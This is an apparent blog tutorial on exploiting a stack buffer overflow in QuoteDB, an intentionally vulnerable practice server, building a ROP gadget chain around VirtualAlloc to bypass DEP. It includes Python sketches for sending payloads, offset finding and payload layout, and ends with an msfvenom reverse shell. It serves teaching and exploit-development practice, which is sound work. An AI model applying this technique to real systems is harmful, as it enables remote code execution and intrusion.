A step-by-step introduction to the use of ROP gadgets to bypass DEP

Summary

DEP (Data Execution Prevention) is a memory protection feature that allows the system to mark memory pages as non-executable. ROP (return-oriented programming) is an exploitation technique that allows an attacker to execute shellcode even when protections such as DEP are enabled. In this blog post, we present the reverse engineering of an application in order to discover a buffer overflow vulnerability and develop a ROP gadget chain that bypasses DEP. We’re planning to write another article that presents a method to bypass ASLR + DEP. We would love to hear your feedback on Twitter.

Exploit development

We will use the following tools in the exploit development process: QuoteDB, TCPView, IDA Freeware, WinDbg, and rp++.

QuoteDB is an intentionally vulnerable application created for practicing reverse engineering and exploit development. As we can see in figure 1, the application is listening for network connections on port 3700:

Figure 1

We’ve used TCPView to confirm that the program is indeed listening on port 3700 (see figure 2).

Figure 2

Now we need to reverse engineer the application and see how it handles a network connection. The accept function is used to accept an incoming connection on the listening socket, and the process then creates a new thread that runs the “handle_connection” routine, as shown below:

Figure 3

The recv function is used to receive data from the connected socket:

Figure 4

We’ve developed a basic Python script that creates a TCP socket and sends 1000 “A” characters to the remote server on port 3700:

Figure 5
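
Because figure 5 is an image, the script can be sketched roughly as follows. This is a minimal sketch and not necessarily the exact script from the figure: the function names and the timeout are assumptions, while the port (3700) and the 1000-byte payload come from the text above.

```python
import socket


def build_payload(size: int = 1000) -> bytes:
    """Return `size` bytes of 0x41 ("A"), as used in the first test."""
    return b"A" * size


def send_payload(host: str, payload: bytes, port: int = 3700,
                 timeout: float = 5.0) -> None:
    """Open a TCP connection to the QuoteDB server and send the payload."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
```

A call such as send_payload("192.168.1.10", build_payload()) would send the test buffer; the IP address here is hypothetical and must be replaced with the address of the machine running QuoteDB.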

We’ve attached WinDbg to the QuoteDB.exe process and listed the loaded modules, as shown in figure 6.

Figure 6

We can use the “bp” command to place a breakpoint after the recv function call and the “bl” command to confirm that the breakpoint was successfully set:

Figure 7

After the recv function returns, the EAX register contains the number of bytes received in hexadecimal:

Figure 8

The first 4 bytes from our buffer represent an Opcode that is moved into the EAX register and then printed in the command line:

Figure 9

Figure 10 presents the printf call in WinDbg, and we can observe that the third argument (= Opcode) consists of 4 “A” characters:

Figure 10

The process displays the source IP address, the source port, the buffer’s length, and the Opcode in decimal:

Figure 11

The application subtracts 0x384 (900 in decimal) from the Opcode and compares the result with 4 (figure 12). This is a switch with 5 cases that was also displayed in figure 9.

Figure 12
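
The opcode handling described above can be modeled in a few lines of Python. This is a sketch of the logic as we read it from the disassembly, not the application’s source code: the function names are ours, and we assume the comparison is unsigned, as is typical for a compiled switch statement.

```python
import struct

SWITCH_BASE = 0x384  # 900, subtracted from the opcode before the comparison
LAST_CASE = 4        # highest case index, which gives 5 cases (0 to 4)
MASK32 = 0xFFFFFFFF


def parse_opcode(buffer: bytes) -> int:
    """Interpret the first 4 bytes of the buffer as a little-endian DWORD."""
    return struct.unpack("<I", buffer[:4])[0]


def switch_case(opcode: int):
    """Return the case index (0 to 4), or None when the default case is taken."""
    index = (opcode - SWITCH_BASE) & MASK32  # assumed 32-bit unsigned wraparound
    return index if index <= LAST_CASE else None


opcode = parse_opcode(b"A" * 1000)
print(opcode, hex(opcode), switch_case(opcode))
```

Under these assumptions, only the opcodes 900 to 904 reach one of the 5 cases, and a buffer that starts with 4 “A” characters (0x41414141) always ends up in the default case.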

The value in the EAX register is greater than 4, so the execution flow is redirected to the default case, which calls the “log_bad_request” function:

Figure 13

The above function contains the buffer overflow vulnerability. As we can see in figure 14, the executable allocates 0x818 (2072) bytes on the stack, initializes a buffer with zeros, and copies our payload to this buffer without checking the boundary:

Figure 14

The overflow occurs because the maximum number of characters to copy (0x4000, or 16384) is greater than the size of the buffer, so the copy can overwrite the saved return address:

Figure 15

We’ve chosen to send 3000 “A” characters in order to exploit the vulnerability. As we can see below, the return address was overwritten on the stack, and the program crashed because of it:

Figure 16
Figure 17

We’ve used the “msf-pattern_create” command to generate a unique pattern that will give us the offset (see figure 18).

Figure 18

The application now crashes at a different address, which we pass to the “msf-pattern_offset” command to determine the exact offset:

Figure 19
Figure 20
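
For readers without the Metasploit tools at hand, the idea behind the two commands can be sketched in Python. This is an illustrative re-implementation that follows the familiar “Aa0Aa1Aa2...” pattern style; it is not the Metasploit code, and the function names are ours.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length: int) -> bytes:
    """Build a pattern made of unique 3-character groups: Aa0Aa1Aa2..."""
    groups = (u + l + d for u, l, d in
              product(ascii_uppercase, ascii_lowercase, digits))
    pattern = "".join(groups)  # 26 * 26 * 10 groups = 20280 characters
    if length > len(pattern):
        raise ValueError("requested length exceeds the pattern size")
    return pattern[:length].encode("ascii")


def pattern_offset(eip: int, length: int) -> int:
    """Return the offset of the 4 bytes found in EIP, or -1 if absent."""
    needle = struct.pack("<I", eip)  # EIP holds the bytes in little-endian order
    return pattern_create(length).find(needle)
```

The value read from EIP at crash time is passed to pattern_offset together with the length of the pattern that was sent; the returned index is the number of bytes that precede the saved return address.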

We’ve modified the proof of concept to include the above offset. After crashing at the correct address, the ESP register points to the last part of the buffer that is under our control:

Figure 21
Figure 22

We’ve used the narly WinDbg extension to display the loaded modules and their memory protections. Figure 23 shows that the executable was compiled with ASLR and DEP protections enabled; however, we’ve disabled ASLR for this blog post. We intend to write another article that presents a method to bypass ASLR + DEP.

Figure 23

Windows Defender Exploit Guard can be used to enable/disable ASLR. We need to go to the “Exploit protection settings”, select the “Program settings” tab, click on “Add program to customize”, and select the “Choose exact file path” option:

Figure 24
Figure 25

We wanted to find out which characters are considered “bad” for our exploit by sending all bytes from “\x00” to “\xFF” and determining how they’re written on the stack:

Figure 26

According to figure 27, there are no bad characters. However, we will raise the stakes and treat “\x00” as a bad character because it usually is one in practice. This makes the exploit development process a bit more complex, but the result can be adapted to other applications more easily.

Figure 27
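
The bad-character check described above can be sketched as a simple comparison between the bytes that were sent and the bytes observed on the stack. This is a minimal sketch with names of our own choosing; the observed bytes would have to be copied manually from the WinDbg memory dump.

```python
from typing import Optional

ALL_BYTES = bytes(range(0x00, 0x100))  # every value from \x00 to \xFF


def first_bad_char(sent: bytes, observed: bytes) -> Optional[int]:
    """Return the first byte that was altered or truncated, or None."""
    for index, byte in enumerate(sent):
        if index >= len(observed) or observed[index] != byte:
            return byte
    return None


def candidate_bytes(exclude: bytes = b"\x00") -> bytes:
    """Return all byte values except those already known to be bad."""
    return bytes(b for b in ALL_BYTES if b not in exclude)
```

Only the first mismatch is reported because a single bad character often corrupts or truncates everything after it; the usual approach is to exclude that byte, resend, and compare again until the function returns None.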

We’ve used the rp++ tool to extract the ROP gadgets from the “SysWOW64\kernel32.dll” module. Because we consider ASLR to be disabled, we could choose any DLL that provides the necessary ROP gadgets. However, we’ll see in a future blog post that the application leaks an address in a specific DLL. We’ve set the maximum number of instructions in a gadget to 5:

Figure 28
Figure 29

Because of the DEP protection, the stack is no longer executable, and we need to find a way to execute our shellcode. We can use APIs such as VirtualAlloc, VirtualProtect, and WriteProcessMemory to bypass DEP. The VirtualAlloc function is used to reserve, commit, or change the state of pages in the address space of the process. The function has 4 parameters:

  • lpAddress
  • dwSize
  • flAllocationType
  • flProtect

Our intention is to set the flAllocationType parameter to 0x1000 (MEM_COMMIT) and flProtect to 0x40 (PAGE_EXECUTE_READWRITE). We need to create the following skeleton on the stack:

  • VirtualAlloc address
  • Return address (Shellcode address)
  • lpAddress (Shellcode address)
  • dwSize (0x1)
  • flAllocationType (0x1000)
  • flProtect (0x40)

We’ve assigned a specific value to every element, which needs to be modified with the correct value at runtime (see figure 30).

Figure 30
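
The skeleton can be sketched in Python as six little-endian DWORDs. The placeholder values below are hypothetical and were chosen only because they are easy to spot in a memory dump and contain no NULL bytes; they are not necessarily the values shown in figure 30.

```python
import struct

# HYPOTHETICAL placeholders; each one is overwritten at runtime by the ROP chain.
SKELETON_FIELDS = [
    ("VirtualAlloc address", 0x45454545),
    ("return address (shellcode address)", 0x46464646),
    ("lpAddress (shellcode address)", 0x47474747),
    ("dwSize", 0x48484848),            # final value: 0x1
    ("flAllocationType", 0x49494949),  # final value: 0x1000 (MEM_COMMIT)
    ("flProtect", 0x51515151),         # final value: 0x40 (PAGE_EXECUTE_READWRITE)
]

skeleton = b"".join(struct.pack("<I", value) for _, value in SKELETON_FIELDS)

# Print the byte offset of every element relative to the start of the skeleton.
for index, (name, value) in enumerate(SKELETON_FIELDS):
    print(f"+0x{index * 4:02X}  0x{value:08X}  {name}")
```

The last element sits 0x14 bytes after the first one, which is the distance used later when the stack pointer is moved back to the start of the skeleton.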

As we can see in figure 31, our skeleton can be found at a fixed offset from the ESP register:

Figure 31

The start address of the kernel32.dll module can be identified using WinDbg (it might be different on your machine). The address of every ROP gadget must be computed from this value, not from the load address present in the “rop.txt” file:

Figure 32
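
The address computation described above amounts to rebasing each gadget. A minimal sketch follows; all three addresses are hypothetical and stand in for the values that rp++ and WinDbg report on a given machine.

```python
import struct


def rebase(listed_address: int, listed_base: int, runtime_base: int) -> int:
    """Translate an address from the rp++ listing to the loaded module."""
    offset = listed_address - listed_base  # gadget offset inside the module
    return runtime_base + offset


def has_null_byte(address: int) -> bool:
    """Check whether the packed address would contain a \\x00 byte."""
    return b"\x00" in struct.pack("<I", address)


# HYPOTHETICAL values, for illustration only.
LISTED_BASE = 0x6B800000   # base address used in the rp++ output
RUNTIME_BASE = 0x75A10000  # kernel32.dll start address reported by WinDbg
gadget = rebase(0x6B812345, LISTED_BASE, RUNTIME_BASE)
print(hex(gadget), has_null_byte(gadget))
```

Checking each rebased address for NULL bytes is worthwhile here because we treat “\x00” as a bad character.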

First, we need to find a ROP gadget that preserves the value of the ESP register. We’ve identified one that copies the ESP register into the ESI register:

Figure 33

We’ve modified our Python script to include the kernel32 address and the above ROP gadget offset, as displayed below:

Figure 34

We’ve successfully redirected the execution flow to our first ROP gadget and we can chain together other ROP gadgets because ESP still points to our buffer:

Figure 35
Figure 36

Now we need to find a way to subtract 0x1C from the ESI register. Because we couldn’t find ROP gadgets that perform computations on the ESI register, we used a ROP gadget that copies the ESI register into EAX instead. This gadget also modifies ESI through a “POP ESI” instruction, but that doesn’t impact our exploit:

Figure 37
Figure 38

Another register that is found in many ROP gadgets is ECX. We’ve identified a ROP gadget that pops a value from the stack into the ECX register and another one that adds the EAX and ECX registers together. Adding a negative value is equivalent to subtracting the same positive value:

Figure 39
Figure 40

After adding -0x1C (the value in ECX) to its previous value, the EAX register points to the VirtualAlloc skeleton:

Figure 41
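
The arithmetic behind this step can be checked in Python. The sketch below models 32-bit register addition with a mask; the stack address is hypothetical, and the helper names are ours.

```python
import struct

MASK32 = 0xFFFFFFFF


def to_u32(value: int) -> int:
    """Return the 32-bit two's complement representation of a value."""
    return value & MASK32


def add32(a: int, b: int) -> int:
    """Model ADD on 32-bit registers: the carry out of bit 31 is discarded."""
    return (a + b) & MASK32


ecx = to_u32(-0x1C)             # the value popped into ECX
saved_esp = 0x0150FA1C          # HYPOTHETICAL stack address held in EAX
skeleton_address = add32(saved_esp, ecx)

print(hex(ecx), hex(skeleton_address))
print(struct.pack("<I", ecx))   # the bytes placed in the payload
print(struct.pack("<I", 0x1C))  # the positive value would need NULL bytes
```

The negative form is what makes the value usable in the payload: -0x1C is encoded as 0xFFFFFFE4, which contains no NULL bytes, whereas 0x1C packed as a DWORD contains three of them.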

Because EAX will be useful in any computation, we need to find a way to preserve it before doing any other operations. We found a ROP gadget that copies the EAX register into ECX, which will be used to modify the values from the skeleton. The fact that EAX is also modified by this ROP gadget doesn’t impact our exploit:

Figure 42

Our modified proof of concept is displayed in figure 43. The “junk” values keep the stack aligned and correspond to the “POP reg” and “retn 4” instructions in the gadgets.

Figure 43

After running the Python script again, we can observe that the ECX register has the same value as the previous EAX register and points to the VirtualAlloc skeleton:

Figure 44

The IAT (Import Address Table) contains pointers to functions that are exported by other DLLs. For example, kernel32.dll has an entry in its IAT for VirtualAlloc, and the location of this entry remains constant even if the actual address of VirtualAlloc changes:

Figure 45

We’ve used the “POP EAX” instruction to load the address of the VirtualAlloc IAT entry into the EAX register, which then needs to be dereferenced in order to obtain the VirtualAlloc address, as shown below:

Figure 46
Figure 47

After updating our Python script and running it again, we’ve successfully obtained the VirtualAlloc address in EAX:

Figure 48

Because ECX still points to the VirtualAlloc skeleton, we need a ROP gadget that contains “MOV [ECX], EAX” in order to update the first skeleton value with the VirtualAlloc address:

Figure 49
Figure 50

We need to find a way to modify the ECX register to point to the next skeleton value. The “INC ECX” instruction is utilized to add 1 to the ECX register, and we’ve used 4 of those:

Figure 51
Figure 52

As we can see in figure 53, ECX points to the next element that has to be modified:

Figure 53

The second skeleton value corresponds to the shellcode address. The first ROP gadget copies the ECX register into EAX. Our idea was to place the shellcode after the ROP gadgets in our payload, at a higher address than the current one. We’ve subtracted a negative offset (-0x210) from the EAX register, which is equivalent to adding 0x210 without placing NULL bytes in the payload, and now EAX points to a buffer that can be populated with our shellcode (see figure 57):

Figure 54
Figure 55
Figure 56
Figure 57

Using a previous ROP gadget, we’ve updated the second value from the skeleton, and now it looks like below:

Figure 58

The third skeleton value (lpAddress) should also be equal to the shellcode address. Similarly, we’ve subtracted a different offset (-0x20C) from the EAX register because EAX is now 4 bytes higher than before. You may notice that the stack addresses differ between two executions, but the offsets remain the same:

Figure 59
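
The relationship between the two offsets can be verified with a short sketch. The stack address below is hypothetical; the point is only that both subtractions must produce the same shellcode address.

```python
MASK32 = 0xFFFFFFFF


def sub32(a: int, b: int) -> int:
    """Model SUB on 32-bit registers with wraparound."""
    return (a - b) & MASK32


return_slot = 0x0150FA04            # HYPOTHETICAL address of the second skeleton value
lpaddress_slot = return_slot + 4    # the third skeleton value is one DWORD higher

first_offset = -0x210 & MASK32      # 0xFFFFFDF0, no NULL bytes
second_offset = -0x20C & MASK32     # 0xFFFFFDF4, no NULL bytes

shellcode_from_second = sub32(return_slot, first_offset)
shellcode_from_third = sub32(lpaddress_slot, second_offset)
print(hex(shellcode_from_second), hex(shellcode_from_third))
```

Because the pointer moved forward by 4 bytes, the distance to the shellcode shrank by 4 bytes, which is why the second offset is -0x20C and not -0x210.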

The fourth skeleton value (dwSize) should be initialized with 1. Because we treat “\x00” as a bad character, we couldn’t just place the required value on the stack, since 0x00000001 contains NULL bytes. Instead, we’ve loaded 0xFFFFFFFF (-1) into EAX and used the “NEG EAX” instruction to negate it, which yields the desired value:

Figure 60
Figure 61
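
The effect of the negation can be modeled in Python with a 32-bit mask. This is a small sketch of the arithmetic only; the helper name is ours.

```python
import struct

MASK32 = 0xFFFFFFFF


def neg32(value: int) -> int:
    """Model NEG on a 32-bit register (two's complement negation)."""
    return (-value) & MASK32


popped = 0xFFFFFFFF                # value placed on the stack and popped into EAX
dw_size = neg32(popped)            # value of EAX after NEG EAX

print(hex(dw_size))
print(struct.pack("<I", popped))   # the payload bytes contain no \x00
```

The same helper gives the value to place on the stack for any small target: neg32(target) is the DWORD that turns into target after the negation.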

The fifth skeleton value (flAllocationType) should be set to 0x1000. We need to find two 32-bit values without NULL bytes whose sum is 0x1000 after the result is truncated to 32 bits, and we choose number1 = 0x88888888. Using simple math, we can determine that the second number must be 0x77778778, as shown below:

Figure 62
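
The “simple math” can be reproduced with 32-bit modular arithmetic. The sketch below derives the second number from the first one and confirms that neither contains a NULL byte; the helper names are ours.

```python
import struct

MASK32 = 0xFFFFFFFF


def complement_for(target: int, first: int) -> int:
    """Return the value that, added to `first`, wraps around to `target`."""
    return (target - first) & MASK32


def add32(a: int, b: int) -> int:
    """Model ADD on 32-bit registers: the carry out of bit 31 is discarded."""
    return (a + b) & MASK32


number1 = 0x88888888
number2 = complement_for(0x1000, number1)

print(hex(number2))                  # 0x77778778
print(hex(add32(number1, number2)))  # 0x1000
print(b"\x00" in struct.pack("<II", number1, number2))  # False
```

Any other NULL-free first number works as long as its complement is also NULL-free, so complement_for can be used to search for alternative pairs.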

We’ve copied the two numbers into EAX and ESI using “POP reg” instructions and performed the addition operation using another ROP gadget, as displayed in figure 63.

Figure 63

Our almost-finished VirtualAlloc skeleton is shown below:

Figure 64

The last skeleton value (flProtect) should be initialized with 0x40. We’ve already provided the necessary steps to obtain the desired result:

Figure 65
Figure 66

Finally, we need to find a way to execute the VirtualAlloc function with the modified parameters. The ECX register, which points to the last skeleton value, is copied into the EAX register, and 0x14 is then subtracted from EAX so that it points to the first value of the VirtualAlloc skeleton (the skeleton has 6 elements of 4 bytes each, so the last one is 5 × 4 = 0x14 bytes past the first). The “xchg” instruction exchanges the contents of the EAX and ESP registers, so ESP now points to the skeleton and the next return instruction transfers execution to VirtualAlloc:

Figure 67

The last part of the ROP gadgets chain is presented below:

Figure 68

After executing the VirtualAlloc API, we can see that the buffer is now executable:

Figure 69
Figure 70

We could determine that the distance between the shellcode address and the last ROP gadget is 0x9C bytes (see figure 71).

Figure 71

We’ve added 0x9C padding bytes and then a fake shellcode containing NOP instructions to confirm that the offset is correct:

Figure 72
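
The overall payload layout at this stage can be sketched as follows. Only the 0x9C padding and the NOP-based fake shellcode come from the text; the prefix length, the gadget addresses, and the size of the NOP block are hypothetical placeholders, and the prefix stands for everything that precedes the saved return address (including the VirtualAlloc skeleton).

```python
import struct

NOP = b"\x90"
PADDING_LEN = 0x9C  # distance between the last ROP gadget and the shellcode


def pack_chain(values) -> bytes:
    """Pack a list of 32-bit values as little-endian DWORDs."""
    return b"".join(struct.pack("<I", value) for value in values)


def build_exploit(prefix: bytes, rop_chain: bytes, shellcode: bytes) -> bytes:
    """Lay out the payload: prefix | ROP chain | 0x9C padding bytes | shellcode."""
    padding = b"C" * PADDING_LEN
    return prefix + rop_chain + padding + shellcode


# HYPOTHETICAL values, for illustration only.
prefix = b"A" * 2000                              # bytes before the return address
rop_chain = pack_chain([0x75A22345, 0x75A2ABCD])  # placeholder gadget addresses
fake_shellcode = NOP * 0x100                      # NOPs used to confirm the offset

exploit = build_exploit(prefix, rop_chain, fake_shellcode)
shellcode_start = len(prefix) + len(rop_chain) + PADDING_LEN
print(len(exploit), hex(shellcode_start))
```

If the offset is correct, the address written into the skeleton points at the first NOP, which can be confirmed in WinDbg before the NOPs are replaced with a real shellcode.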

We’ve generated a reverse shell using msfvenom and successfully executed our exploit. DEP was bypassed by chaining together multiple ROP gadgets that performed a VirtualAlloc call and marked the memory page containing the shellcode as executable.

Figure 73
Figure 74